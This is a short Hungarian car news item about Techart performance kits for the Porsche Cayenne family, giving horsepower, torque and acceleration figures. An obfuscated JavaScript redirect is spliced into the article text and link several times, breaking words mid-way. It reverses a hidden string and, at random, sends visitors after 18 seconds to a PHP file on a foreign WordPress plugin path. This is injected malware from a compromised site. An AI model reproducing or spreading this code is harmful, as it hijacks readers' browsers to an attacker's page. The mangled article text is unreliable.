Immár a Porsche Cayenne család összes tagjához kínál teljesítménynövelő szettet a Techart. A legújabb fejlesztés egyben a leglátványosabb is: a 4,0 literes V8-as motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral szerelt GTS gyári 460 lóereje helyett 640 lóerőt kapunk, a 620 Nm-es nyomaték 870 Nm-re emelkedik. A végsebesség eléri a 300 km/órát, az autó 3,9 mp alatt gyorsul 100 km/órára, 200-ra pedig 12,5 másodpercig tart a sprint. A gyári értékek ugyanennél a típusnál 270 km/óra, 4,8 mp és 17,9 mp – ezek már érezhető különbségek. A Techart a hibrid modelleket sem hanyagolja el. A Cayenne E-Hybrid 462 helyett 550 lóerős, nyomaték 700-ról 830 Nm-re nő. A…
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/nap-kepe-videoja/2020/12/18/porsche-x-techart.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/nap-kepe-videoja/2020/12/18/porsche-x-techart.html
- Hirdetés -